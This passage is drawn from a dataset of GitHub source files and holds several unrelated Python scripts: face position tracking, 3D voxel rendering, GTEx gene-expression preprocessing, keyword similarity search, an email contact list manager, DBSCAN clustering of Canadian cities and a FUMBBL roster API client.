 cm_per_px = self.REAL_IPD / virt_ipd\n\n        return mid_x_px * cm_per_px, mid_y_px * cm_per_px\n\n    def calcPosition(self, detection, image_height, image_width):\n        \"\"\"\n        Define Origin as webcam position. Positive Z is towards viewer. +X is to the right of user-perspective. 
+Y is \"down\".\n \"\"\"\n bBox = detection.location_data.relative_bounding_box\n\n boundBox = (\n int(bBox.xmin * image_width),\n int(bBox.ymin * image_height),\n int(bBox.width * image_width),\n int(bBox.height * image_height),\n )\n\n z = self.convertBoundingBoxWidthToDistance(boundBox[2]) # cm\n\n virt_ipd = self.calcIPD(detection, image_height, image_width)\n\n x, y = self.calcXYPosition(detection, image_height, image_width, virt_ipd) # cm\n\n return x, y, z\n\n def smoothPosition(self, raw_x, raw_y, raw_z):\n \"\"\"\n applies smoothing functions to raw x, y and z positions\n \"\"\"\n self.xPositionQueue.append(raw_x)\n self.yPositionQueue.append(raw_y)\n self.zPositionQueue.append(raw_z)\n\n means = (\n mean(self.xPositionQueue),\n mean(self.yPositionQueue),\n mean(self.zPositionQueue),\n )\n\n return [float(f\"{x:.1f}\") for x in means]\n\n def positionSmoothingFunc(self, q):\n return int(mean(q))\n\n def getRelativeEyePosition(self, detection):\n left_eye_pt = detection.location_data.relative_keypoints[\n self.LEFT_EYE_INDEX\n ].__deepcopy__()\n left_eye_pt.x += self.RELATIVE_EYE_POSITION_OFFSET\n left_eye_pt.y += self.RELATIVE_EYE_POSITION_OFFSET\n\n right_eye_pt = detection.location_data.relative_keypoints[\n self.RIGHT_EYE_INDEX\n ].__deepcopy__()\n right_eye_pt.x += self.RELATIVE_EYE_POSITION_OFFSET\n right_eye_pt.y += self.RELATIVE_EYE_POSITION_OFFSET\n\n return left_eye_pt, right_eye_pt\n\n def smoothEyePositions(self, detection, image_height, image_width):\n left_eye_pt = detection.location_data.relative_keypoints[self.LEFT_EYE_INDEX]\n right_eye_pt = detection.location_data.relative_keypoints[self.RIGHT_EYE_INDEX]\n self.rightEyeXQueue.append(int(right_eye_pt.x * image_width))\n self.rightEyeYQueue.append(int(right_eye_pt.y * image_height))\n\n self.leftEyeXQueue.append(int(left_eye_pt.x * image_width))\n self.leftEyeYQueue.append(int(left_eye_pt.y * image_height))\n\n out = [self.positionSmoothingFunc(x) for x in self.allSmoothQs]\n\n return (out[0], out[1]), (out[2], out[3])\n","repo_name":"adewinter/perspective","sub_path":"python/position_calculator.py","file_name":"position_calculator.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19973974006","text":"import numpy as np\n\nfrom simple_3dviz import Mesh, Lines\nfrom simple_3dviz.window import show\n\n\ndef heart_voxel_grid(N):\n \"\"\"Create a NxNxN voxel grid with True if the voxel is inside a heart\n object and False otherwise.\"\"\"\n x = np.linspace(-1.3, 1.3, N)\n y = np.linspace(-1.3, 1.3, N)\n z = np.linspace(-1.3, 1.3, N)\n x, y, z = np.meshgrid(x, y, z)\n return (2*x**2 + y**2 + z**2-1)**3 - (1/10) * x**2*z**3 - y**2*z**3 < 0\n\n\nif __name__ == \"__main__\":\n voxels = heart_voxel_grid(64)\n m = Mesh.from_voxel_grid(voxels, colors=(0.8, 0, 0))\n l = Lines.from_voxel_grid(voxels, colors=(0, 0, 0.), width=0.001)\n show([l, m])\n","repo_name":"angeloskath/simple-3dviz","sub_path":"examples/render_line_voxels.py","file_name":"render_line_voxels.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"21"} +{"seq_id":"20682205367","text":"import os\nimport random\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ng_write_df = True\n\nprint(\"+ This will take about 10 minutes with a power laptop, but requires a lot of memory for doing a groupby median on the gene expression\")\nprint(\"+ Results in 
annotated geneset that is compatible with other datasets, like TCGA and TARGET\")\nprint(\"\"\"+ First run: \n    get_gtex.sh\n\"\"\")\n\n# Commit from https://github.com/cognoma/genes\n# use this to make a compatible geneset annotation (thanks, Biobombe!)\ngenes_commit = 'ad9631bb4e77e2cdc5413b0d77cb8f7e93fc5bee'\n\ndef get_gene_df():\n    url = 'https://raw.githubusercontent.com/cognoma/genes/{}/data/genes.tsv'.format(genes_commit)\n    gene_df = pd.read_table(url)\n\n    # Only consider protein-coding genes\n    gene_df = (\n        gene_df.query(\"gene_type == 'protein-coding'\")\n    )\n    return gene_df\n\ndef get_old_to_new_entrez_ids():\n    # Load gene updater - old to new Entrez gene identifiers\n    url = 'https://raw.githubusercontent.com/cognoma/genes/{}/data/updater.tsv'.format(genes_commit)\n    updater_df = pd.read_table(url)\n    old_to_new_entrez = dict(zip(updater_df.old_entrez_gene_id,\n                                 updater_df.new_entrez_gene_id))\n    return old_to_new_entrez\n\n\nrandom.seed(1234)\nos.makedirs(\"data/gtex\",exist_ok=True)\n\nattr_path = 'dist/gtex/GTEx_Analysis_v8_Annotations_SampleAttributesDS.txt'\nattr_df = pd.read_table(attr_path)\n\n###### Process the gene expression data\n\n# This involves updating Entrez gene ids, sorting and subsetting\n\nprint(\"+ Read gene expression - this takes a little while\")\nos.makedirs(f\"data/gtex\",exist_ok=True)\nexpr_path = 'dist/gtex/GTEx_Analysis_2017-06-05_v8_RNASeQCv1.1.9_gene_tpm.gct.gz'\nexpr_df = pd.read_table(expr_path, sep='\\t', skiprows=2, index_col=1)\n\n\nprint(\"+ Get GTEx gene mapping\")\nexpr_gene_ids = (\n    expr_df\n    .loc[:, ['Name']]\n    .reset_index()\n    .drop_duplicates(subset='Description')\n)\nprint(\"+ Perform inner merge gene df to get ensembl to entrez mapping\")\ngene_df=get_gene_df()\nmap_df = expr_gene_ids.merge(gene_df, how='inner', left_on='Description', right_on='symbol')\nprint(\"+ Save map, expression dataframes\")\nif g_write_df:\n    map_df.reset_index().to_feather(f\"data/gtex/map.ftr\") # if you run out of memory, this will load fast\nelse:\n    print(\"+ ! don't write map.ftr\")\n\n\n# transform expression matrix\nprint(\"+ *Drop 'Name' column...\")\nexpr_df=expr_df.drop(['Name'], axis='columns')\nprint(\"+ *Drop any rows with 'na's...\")\nexpr_df=expr_df.dropna(axis='rows')\nprint(\"+ * Use groupby to collapse duplicate genes by median (199 genes are duplicated, some more than twice, for a total of 1608 values) ...\")\nexpr_df=expr_df.groupby(level=0).median()\nprint(\"+ *reindex map...\")\nexpr_df=expr_df.reindex(map_df.symbol)\nsymbol_to_entrez = dict(zip(map_df.symbol, map_df.entrez_gene_id))\nprint(\"+ *rename...\")\nexpr_df=expr_df.rename(index=symbol_to_entrez)\nprint(\"+ *rename again...\")\nexpr_df=expr_df.rename(index=get_old_to_new_entrez_ids()) # add in gene annotations\nprint(\"+ *transpose...\")\nexpr_df = expr_df.transpose()\nprint(\"+ *sort by row...\")\nexpr_df = expr_df.sort_index(axis='rows')\nprint(\"+ *sort by columns...\")\nexpr_df = expr_df.sort_index(axis='columns')\nprint(\"+ rename index\")\nexpr_df.index.rename('sample_id', inplace=True)\n\n# change gene integer ids to strings so feather will accept column names \nexpr_df.columns=expr_df.columns.astype(str)\n\nif g_write_df:\n    print(\"+ write expr one more time\")\n    expr_df.reset_index().to_feather(f\"data/gtex/expr.ftr\")\n    file=f\"data/gtex/gene_ids.txt\"\n    print(f\"+ Write out gene ids in order ({file})\")\n    with open(file,\"a\") as f:\n        for col in expr_df.columns:\n            f.write(f\"{col}\\n\")\nelse:\n    print(\"++ ! Didn't write expr.ftr\")\n    print(\"++ ! 
Didn't write gene_ids.txt\")\n\nprint(\"+ Write out superclass names\")\n\nprint(\"++ Change attr tissue type names to something directory-friendly\")\nattr_df[\"SMTS\"] = attr_df[\"SMTS\"].str.strip()\nattr_df[\"SMTS\"] = attr_df[\"SMTS\"].str.replace(' - ','-')\n# keep .str.replace for both patterns: a bare Series.replace only matches whole values\nattr_df[\"SMTS\"] = attr_df[\"SMTS\"].str.replace(' \\(','__').str.replace('\\)','__')\nattr_df[\"SMTS\"] = attr_df[\"SMTS\"].str.replace(' ','_')\n\nclass_names=set(attr_df[\"SMTS\"])\nprint(f\"++ Class names set: {class_names}\")\n\nif g_write_df:\n    attr_df[[\"SAMPID\",\"SMTS\"]].to_csv(f\"data/gtex/sample_id-superclass_name.tsv\", sep=\"\\t\", index=False, header=False)\nelse:\n    print(\"++ ! Didn't write sample_id-superclass_name.tsv\")\n\n\nprint(\"+ Create dir structure for classes\")\nos.makedirs(f'data/gtex', exist_ok=True)\nfor cls in class_names:\n    os.makedirs(f\"data/gtex/{cls}\",exist_ok=True)\n\nprint(f\"+ Create a numpy for each row, write to data/gtex, separate out later\")\nimport gzip\nimport numpy as np\nfor idx, nparray in enumerate(np.array(expr_df.iloc[:])):\n    nparray=nparray.astype(np.float16)\n    sample_id=expr_df.index[idx]\n    cls=attr_df.loc[attr_df[\"SAMPID\"]==sample_id, \"SMTS\"].iloc[0]\n    if g_write_df:\n        with gzip.GzipFile(f\"data/gtex/{cls}/{sample_id}.npy.gz\", \"w\") as f:\n            np.save(file=f, arr=nparray)\n    else:\n        print(f\"Didn't write {sample_id}.npy.gz.\")\n\nstrat = attr_df.set_index('SAMPID').reindex(expr_df.index).SMTSD\ntissuetype_count_df = (\n    pd.DataFrame(strat.value_counts())\n    .reset_index()\n    .rename({'index': 'tissuetype', 'SMTSD': 'n ='}, axis='columns')\n)\n\nfile = f'data/gtex/superclass-count.tsv'\nprint(f\"+ Write tissue type counts {file}\")\nif g_write_df:\n    tissuetype_count_df.to_csv(file, sep='\\t', index=False)\nelse:\n    print(f\"Didn't write {file}\")\n\nprint(f\"+ tissue type counts: {tissuetype_count_df}\")\n\nprint(\"\"\"+ Reload each observation like such:\nimport gzip\nimport numpy as np\nwith gzip.GzipFile(f'data/gtex/<class>/<sample_id>.npy.gz') as f:\n    obs=np.load(f)\n\"\"\")\n\n\n","repo_name":"krobasky/tiscla","sub_path":"src/gtex-preprocess.py","file_name":"gtex-preprocess.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18778021616","text":"import json\r\nimport numpy as np\r\nfrom collections import OrderedDict\r\nfrom annoy import AnnoyIndex\r\nfrom build import build,getKeyword,getVectors\r\n\r\ndef main():\r\n    with open('./res/three_fourth_tc_word_index.json', 'r') as fp:\r\n        word_index = json.load(fp)\r\n    tc_index = AnnoyIndex(200)\r\n    tc_index.load('./res/three_fourth_tc_index_build.index')\r\n    reverse_word_index = dict([(index,word) for (word,index) in word_index.items()])\r\n\r\n    keyword = input(\"Keyword (type end to quit): \")\r\n    while(True):\r\n        if(keyword=='end'):\r\n            break\r\n        else:\r\n            index=word_index.get(keyword+'\\n')\r\n            if(index):\r\n                result= tc_index.get_nns_by_item(index,5,include_distances=True)\r\n                sim_keywords = [(str(reverse_word_index[idx]).strip(), distance) for idx, distance in zip(result[0], result[1]) if\r\n                                distance < 0.9]\r\n                \r\n                print(sim_keywords)\r\n            else:\r\n                print('Keyword is not in the dictionary!')\r\n            keyword = input(\"Keyword (type end to quit): \")\r\n\r\n\r\n#build()\r\nmain()\r\n","repo_name":"Zzzyyy-KB/keyword","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31515927502","text":"import csv\nfrom os.path import isfile\n\nfrom 
carbonmail.database.manager import search_contacts, search_list\nfrom carbonmail.database.manager import create_list as db_create_list\nfrom carbonmail.database.manager import create_contact as db_create_contact\nfrom carbonmail.database.manager import delete_list as db_delete_list\n\nfrom carbonmail.utils import string_null_or_empty, valid_email\n\n\ndef initialize(email_sender):\n    from carbonmail.list_editor import List_Editor\n\n    ls = List_Editor(email_sender)\n    ls.enable_window()\n\n\ndef load_lists():\n    lists = search_list()\n    lists = [_list[1] for _list in lists]\n\n    return lists\n\n\ndef create_list(list_name):\n    if string_null_or_empty(list_name):\n        return False\n\n    db_create_list(list_name)\n    return True\n\n\ndef update_lists(window, selected_list=None):\n    lists = load_lists()\n\n    if selected_list:\n        selected_index = lists.index(selected_list)\n    else:\n        selected_index = 0\n\n    window[\"-Lists-\"].Update(values=lists, value=lists[selected_index])\n\n\ndef import_contact(csv_path, list_name):\n\n    if not isfile(csv_path):\n        return -1\n\n    with open(csv_path, \"r\", encoding=\"utf-8\") as csv_file:\n        dialect = csv.Sniffer().sniff(csv_file.read(1024))\n        csv_file.seek(0)\n\n        reader = csv.DictReader(csv_file, dialect=dialect)\n\n        if not \"name\" in reader.fieldnames or not \"email\" in reader.fieldnames:\n            return 0\n\n        for row in reader:\n            create_contact(row[\"name\"], row[\"email\"], list_name)\n\n\ndef create_contact(name, email, list_name):\n    if (\n        string_null_or_empty(name)\n        or string_null_or_empty(email)\n        or not valid_email(email)\n    ):\n        return False\n\n    lists = search_list()\n\n    list_id = 0  # Default\n    for _list in lists:\n        if _list[1] == list_name:\n            list_id = _list[0]\n            break\n\n    db_create_contact(name, email, list_id)\n    return True\n\n\ndef delete_list(list_name):\n    db_delete_list(list_name)\n\n\ndef get_list_contacts(list_name):\n    return search_contacts(list_name)\n","repo_name":"fcrdossantos/carbonmail","sub_path":"carbonmail/list_editor/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4348506533","text":"import numpy as np\nimport pandas as pd\nimport geopandas as gpd\nimport folium\nfrom shapely.geometry import Point, MultiPoint\nfrom geopy.distance import great_circle\nfrom sklearn.cluster import DBSCAN\n\n\nclass create_cluster_map:\n\n    def __init__(self,epsilon,min_samples):\n\n        self.epsilon = epsilon\n        self.min_samples = min_samples\n\n    \n    def import_data(self):\n        data_path = r\"C:\\Users\\jua12849\\Documents\\GitHub\\GeospatialDataAnalysis\\canadacities.csv\"\n        canadian_cities = pd.read_csv(data_path)\n        datum = \"EPSG:4326\"\n\n        #create geodataframe containing data with all canadian cities and a point geometry column\n        geometry = [Point(xy) for xy in zip(canadian_cities[\"lng\"],canadian_cities[\"lat\"])]\n        gdf = gpd.GeoDataFrame(canadian_cities,crs=datum,geometry=geometry)\n\n        return gdf\n\n\n    def create_gdf_dictionary(self,gdf):\n        #create dictionary with complete data for each province\n        d = {}\n        for city in gdf.province_id.unique():\n            d[\"city_{}\".format(city)] = gdf.loc[gdf[\"province_id\"]==city]\n\n        return d\n\n    def obtain_provinces(self,d):\n        provinces = list(d.keys())\n        \n        return provinces\n\n\n    def create_numpy_dictionary(self,d,gdf,provinces):\n        #obtain province names as well as list of dictionary keys.\n\n        #obtain lat/long data for each province and the entire country as a numpy array.\n        d_lat_lon_numpy = {}\n        for province in provinces:\n            d_lat_lon_numpy[\"{}\".format(province)] = [d.get(province)[[\"lat\",\"lng\"]].to_numpy()]\n\n        d_lat_lon_numpy[\"Canada\"] = [gdf[[\"lat\",\"lng\"]].to_numpy()]\n\n        return 
d_lat_lon_numpy\n\n \n def get_centermost_point(self,cluster):\n centroid = (MultiPoint(cluster).centroid.x, MultiPoint(cluster).centroid.y)\n centermost_point = min(cluster, key=lambda point: great_circle(point, centroid).m)\n return tuple(centermost_point)\n\n def perform_dbscan(self,d_lat_lon_numpy,epsilon=0.019,min_samples=1):\n #kms_per_radian = 6371.0088\n #epsilon = 50 / kms_per_radian\n #epsilon = 0.019\n #min_samples=1\n\n #perform DBSCAN algorithm to each province separately as well as the entire country\n for province in list(d_lat_lon_numpy.keys()):\n #Create DBSCAN object and apply to each latitude/longitude pair\n d_lat_lon_numpy[\"{}\".format(province)].append(\n {\"dbs_{}\".format(province):DBSCAN(eps=epsilon, min_samples=min_samples,algorithm = 'ball_tree',metric='haversine').fit(np.radians(d_lat_lon_numpy.get(province)[0]))})\n #Retrieve labels obtained from algorithm\n d_lat_lon_numpy[\"{}\".format(province)].append(\n {\"{}_cluster_label\".format(province):d_lat_lon_numpy.get(province)[1][\"dbs_{}\".format(province)].labels_})\n #Obtain cluster labels\n d_lat_lon_numpy[\"{}\".format(province)].append(\n {\"{}_num_clusters\".format(province):len(set(d_lat_lon_numpy.get(province)[2][\"{}_cluster_label\".format(province)]))})\n #\n d_lat_lon_numpy[\"{}\".format(province)].append(\n {\"{}_clusters\".format(province):\n pd.Series(d_lat_lon_numpy.get(province)[0][d_lat_lon_numpy.get(province)[2][\"{}_cluster_label\".format(province)] == n] for n in range(d_lat_lon_numpy[\"{}\".format(province)][3][\"{}_num_clusters\".format(province)]))})\n\n d_lat_lon_numpy[\"{}\".format(province)].append(\n {\"{}_centermost_points\".format(province):d_lat_lon_numpy.get(province)[4][\"{}_clusters\".format(province)].map(self.get_centermost_point)})\n\n #unzip the list of centermost points (lat,lon) tuples into separate lat/lon lists\n lats, lons = zip(*d_lat_lon_numpy.get(province)[5][\"{}_centermost_points\".format(province)])\n #create a pandas dataframe\n rep_points = pd.DataFrame({'lon':lons, 'lat':lats})\n\n d_lat_lon_numpy[\"{}\".format(province)].append({\"{}_centermost_points_numpy\".format(province) : rep_points.to_numpy()})\n\n d_lat_lon_numpy[\"{}\".format(province)].append(\n {\"{}_gdf_cluster_samples\".format(province):gpd.GeoDataFrame(rep_points, geometry=gpd.points_from_xy(rep_points.lon, rep_points.lat),crs = \"EPSG:4326\" )})\n\n return d_lat_lon_numpy\n\n def calculate_mean_ontario_loc(self,d): \n #mean location for ontario cities\n mean_lat_on = np.mean(d[\"city_ON\"][\"lat\"])\n mean_lng_on = np.mean(d[\"city_ON\"][\"lng\"])\n \n return mean_lat_on,mean_lng_on\n\n def calculate_mean_canada_loc(self,gdf):\n #mean location for canada cities\n gdf_mean_lat = np.mean(gdf.lat)\n gdf_mean_lng = np.mean(gdf.lng)\n\n return gdf_mean_lat,gdf_mean_lng\n\n def cities_dict(self,d_lat_lon_numpy,provinces):\n cities = {}\n for province in provinces:\n cities[\"{}\".format(province)] = d_lat_lon_numpy.get(\"{}\".format(province))[0]\n \n return cities\n\n def clusters_dict(self,d_lat_lon_numpy,provinces):\n clusters={}\n for province in provinces:\n clusters[\"{}\".format(province)] = d_lat_lon_numpy.get(\"{}\".format(province))[6].get(\"{}_centermost_points_numpy\".format(province))\n \n return clusters\n\n def study_area_numpy(self,cities):\n study_area = np.concatenate([cities[\"city_ON\"],\n cities[\"city_QC\"],\n cities[\"city_NB\"],\n cities[\"city_NS\"]])\n\n return study_area\n\n def cluster_area_numpy(self,clusters):\n study_clusters = np.concatenate([clusters[\"city_ON\"],\n 
clusters[\"city_QC\"],\n clusters[\"city_NB\"],\n clusters[\"city_NS\"]])\n \n return study_clusters\n\n\n def create_map(self,gdf_mean_lat,gdf_mean_lng,study_area,study_clusters,zoom):\n\n my_map = folium.Map(location=[gdf_mean_lat,gdf_mean_lng], zoom_start=zoom)\n\n for point in study_clusters :\n loc = [point[1],point[0]]\n folium.Marker(location=loc,icon=folium.Icon(color=\"red\")).add_to(my_map)\n #folium.Circle(radius=40000,location=[point[1],point[0]],color=\"red\").add_to(my_map)\n\n for point in study_area :\n loc = [point[0],point[1]]\n #folium.Marker(location=loc,icon=folium.Icon(color=\"blue\")).add_to(my_map)\n folium.Circle(radius=4000,location=loc,color=\"BLUE\").add_to(my_map)\n \n #folium.GeoJson(data = gdf).add_to(my_map) \n\n return my_map \n\n \n def run_map(self):\n\n \n gdf = self.import_data()\n d = self.create_gdf_dictionary(gdf)\n provinces = self.obtain_provinces(d)\n d_lat_lon_numpy = self.create_numpy_dictionary(d,gdf,provinces)\n d_lat_lon_numpy = self.perform_dbscan(d_lat_lon_numpy,epsilon = self.epsilon,min_samples=self.min_samples)\n mean_lat_on,mean_lng_on = self.calculate_mean_ontario_loc(d)\n gdf_mean_lat, gdf_mean_lng = self.calculate_mean_canada_loc(gdf)\n clusters = self.clusters_dict(d_lat_lon_numpy,provinces)\n cities = self.cities_dict(d_lat_lon_numpy,provinces)\n study_area = self.study_area_numpy(cities)\n study_clusters = self.cluster_area_numpy(clusters)\n map = self.create_map(gdf_mean_lat,gdf_mean_lng,study_area,study_clusters,zoom=5)\n\n return map","repo_name":"JuanCReyes1/GeospatialDataAnalysis","sub_path":"testclass.py","file_name":"testclass.py","file_ext":"py","file_size_in_byte":7297,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"31824494710","text":"import copy\r\nimport json\r\nfrom types import MappingProxyType\r\nimport warnings\r\n\r\nfrom pyfumbbl._session import with_default_session\r\nfrom pyfumbbl import exc\r\nfrom pyfumbbl import position\r\n\r\n__all__ = [\r\n 'add',\r\n 'add_star',\r\n 'append_to_ruleset',\r\n 'clone_to_ruleset',\r\n 'create',\r\n 'get',\r\n 'remove',\r\n 'remove_star',\r\n 'search',\r\n 'set_data',\r\n ]\r\n\r\n_NO_DATA = {'positions': [], 'stars': []}\r\n\r\nclass NoRosterDataError(exc.NoDataError):\r\n pass\r\n\r\n\r\nDEFAULT_LOGOS = MappingProxyType(dict((\r\n ('32', '486370'),\r\n ('48', '486369'),\r\n ('64', '486371'),\r\n ('96', '486372'),\r\n ('128', '486373'),\r\n ('192', '486374'),\r\n)))\r\n\r\n\r\nDETAILED_POSITIONS = 0b1\r\nDETAILED_STARS = 0b10\r\n\r\n\r\ndef _rejuvenate(roster_data, _rejuvenate_positions=True,\r\n del_stars=False):\r\n if 'id' in roster_data:\r\n del roster_data['id']\r\n if 'positions' in roster_data and _rejuvenate_positions:\r\n for position_data in roster_data['positions']:\r\n position._rejuvenate(position_data)\r\n if 'stars' in roster_data and del_stars:\r\n for star_data in roster_data['stars']:\r\n if 'id' in star_data:\r\n del star_data['id']\r\n return roster_data\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef add(ruleset_id, roster_id, session=None):\r\n ruleset_id = str(ruleset_id)\r\n assert ruleset_id.isdecimal()\r\n roster_id = str(roster_id)\r\n assert roster_id.isdecimal()\r\n url = session.baseurl / 'api/roster/add'\r\n data = {'ruleset': ruleset_id, 'roster': roster_id}\r\n r = session.post(url, data=data)\r\n return r.json()\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef add_star(roster_id, position_id, session=None):\r\n 
roster_id = str(roster_id)\r\n    assert roster_id.isdecimal()\r\n    position_id = str(position_id)\r\n    assert position_id.isdecimal()\r\n    url = session.baseurl / f'api/roster/addStar/{roster_id}'\r\n    data = {'star': position_id}\r\n    r = session.post(url, data=data)\r\n    return r.json()\r\n\r\n\r\n@with_default_session\r\ndef append_to_ruleset(roster_data, target_ruleset_id,\r\n    session=None):\r\n  name = roster_data['name']\r\n  _rejuvenate(roster_data)\r\n  roster_id = create(target_ruleset_id, name, session=session)\r\n  set_data(roster_data, roster_id, match_positions_by='none',\r\n      session=session)\r\n  return roster_id\r\n\r\n\r\n@with_default_session\r\ndef clone_to_ruleset(roster_id, target_ruleset_id,\r\n    session=None):\r\n  roster_data = get_data(roster_id, flags=DETAILED_POSITIONS,\r\n      session=session)\r\n  return append_to_ruleset(roster_data, target_ruleset_id,\r\n      session=session)\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef create(ruleset_id, name, session=None):\r\n  \"\"\"Creates a new roster and returns its ID\"\"\"\r\n  ruleset_id = str(ruleset_id)\r\n  assert ruleset_id.isdecimal()\r\n  data = {'ruleset': ruleset_id, 'name': name}\r\n  url = session.baseurl / 'api/roster/create'\r\n  r = session.post(url, data=data)\r\n  return r.json()\r\n\r\n\r\n@with_default_session\r\ndef get_data(roster_id, flags=0, session=None):\r\n  \"\"\"Returns a roster's data.\r\n\r\n  Possible flags are:\r\n  DETAILED_POSITIONS - provides more detailed data for\r\n      positions\r\n  DETAILED_STARS - likewise for the roster's star players\r\n  \"\"\"\r\n  roster_id = str(roster_id)\r\n  assert roster_id.isdecimal()\r\n  url = session.baseurl / f'api/roster/get/{roster_id}'\r\n  r = session.get(url)\r\n  roster_data = exc.api_error_checked(r.json())\r\n  if roster_data == _NO_DATA:\r\n    errfs = 'No roster exists with ID = {}.'\r\n    raise NoRosterDataError(errfs.format(roster_id))\r\n  if flags & DETAILED_POSITIONS:\r\n    for position_data in roster_data.get('positions', []):\r\n      if 'id' in position_data:\r\n        position_id = position_data['id']\r\n        detailed_position_data = position.get_data(position_id,\r\n            session=session)\r\n        position_data.update(detailed_position_data)\r\n  if flags & DETAILED_STARS:\r\n    for position_data in roster_data.get('stars', []):\r\n      if 'id' in position_data:\r\n        position_id = position_data['id']\r\n        detailed_position_data = position.get_data(position_id,\r\n            session=session)\r\n        position_data.update(detailed_position_data)\r\n  return roster_data\r\n\r\n\r\nget = get_data\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef remove(ruleset_id, roster_id, session=None):\r\n  ruleset_id = str(ruleset_id)\r\n  assert ruleset_id.isdecimal()\r\n  roster_id = str(roster_id)\r\n  assert roster_id.isdecimal()\r\n  url = session.baseurl / 'api/roster/remove'\r\n  data = {'ruleset': ruleset_id, 'roster': roster_id}\r\n  r = session.post(url, data=data)\r\n  return r.json()\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef remove_star(roster_id, position_id, session=None):\r\n  roster_id = str(roster_id)\r\n  assert roster_id.isdecimal()\r\n  position_id = str(position_id)\r\n  assert position_id.isdecimal()\r\n  url = session.baseurl / f'api/roster/removeStar/{roster_id}'\r\n  data = {'star': position_id}\r\n  r = session.post(url, data=data)\r\n  return r.json()\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef search(name=\"___\", owner=None, *, session=None):\r\n  \"\"\"Searches for rosters by name and/or owner\"\"\"\r\n  # 
https://fumbbl.com/index.php?name=PNphpBB2&file=viewtopic&p=681044&highlight=#681044\r\n s = str(name)\r\n if owner is not None:\r\n s = f'{owner}/{s}'\r\n data = {'search': s}\r\n url = session.baseurl / 'api/roster/search'\r\n r = session.post(url, data=data)\r\n return r.json()\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef search_by_owner(name, session=None):\r\n \"\"\"Searches for rosters by a name string\"\"\"\r\n data = {'search': str(name)}\r\n url = session.baseurl / 'api/roster/search'\r\n r = session.post(url, data=data)\r\n return r.json()\r\n\r\n\r\n@exc.returns_api_error_checked_result\r\n@with_default_session\r\ndef _set_data(roster_id, keyvals, session=None):\r\n \"\"\"Sets the preferences of a roster.\"\"\"\r\n if isinstance(keyvals, dict):\r\n keyvals = [{'key': k, 'val': v} for k, v in keyvals.items()]\r\n roster_id = str(roster_id)\r\n assert roster_id.isdecimal()\r\n url = session.baseurl / f'api/roster/set/{roster_id}'\r\n data = {\"data\": json.dumps(keyvals)}\r\n r = session.post(url, data=data)\r\n return r.json()\r\n\r\n\r\n@with_default_session\r\ndef set_data(roster_data, roster_id=None,\r\n match_positions_by='id',\r\n session=None):\r\n \"\"\"Sets the preferences of a roster.\"\"\"\r\n assert match_positions_by in ('none', 'id', 'title')\r\n working_keys = {\r\n 'apothecary',\r\n 'finesse',\r\n 'info',\r\n 'name',\r\n 'necromancer',\r\n 'physique',\r\n 'playable',\r\n 'raisePosition',\r\n 'rerollCost',\r\n 'undead',\r\n 'versatility',\r\n }\r\n _roster_data = copy.deepcopy(roster_data)\r\n\r\n if roster_id is None:\r\n if 'id' in roster_data:\r\n roster_id = roster_data['id']\r\n del _roster_data['id']\r\n else:\r\n raise AttributeError('roster id is not defined')\r\n elif 'id' in roster_data:\r\n del _roster_data['id']\r\n\r\n if {'positions', 'stars'} & set(_roster_data):\r\n old_data = get_data(roster_id, session=session)\r\n\r\n if 'positions' in _roster_data:\r\n if match_positions_by != 'none':\r\n old_positions = {p[match_positions_by]: p\r\n for p in old_data['positions']\r\n if match_positions_by in p}\r\n new_positions = {p[match_positions_by]: p\r\n for p in _roster_data['positions']\r\n if match_positions_by in p}\r\n for k in set(old_positions) - set(new_positions):\r\n position.remove(roster_id, old_positions[k]['id'],\r\n session=session)\r\n for position_data in _roster_data['positions']:\r\n position_id = position_data.get('id')\r\n if match_positions_by != 'none':\r\n old_position_data = old_positions.get(position_data.get(\r\n match_positions_by))\r\n if old_position_data:\r\n position_id = old_position_data['id']\r\n if position_id is None:\r\n position_id = position.create(roster_id,\r\n position_data['name'], session=session)\r\n position_data['id'] = position_id\r\n position.set_data(position_data, session=session)\r\n del _roster_data['positions']\r\n\r\n if 'stars' in _roster_data:\r\n old_stars = set(s['id'] for s in old_data.get('stars', [])\r\n if s.get('id'))\r\n new_stars = set(s['id'] for s in _roster_data['stars']\r\n if s.get('id'))\r\n for position_id in old_stars - new_stars:\r\n remove_star(roster_id, position_id, session=session)\r\n for position_id in new_stars - old_stars:\r\n add_star(roster_id, position_id, session=session)\r\n del _roster_data['stars']\r\n\r\n if 'stats' in _roster_data:\r\n for k, v in _roster_data['stats'].items():\r\n _roster_data[k] = v\r\n del _roster_data['stats']\r\n\r\n for k in _roster_data.keys():\r\n if k not in working_keys:\r\n wfs = 'not in working keys: 
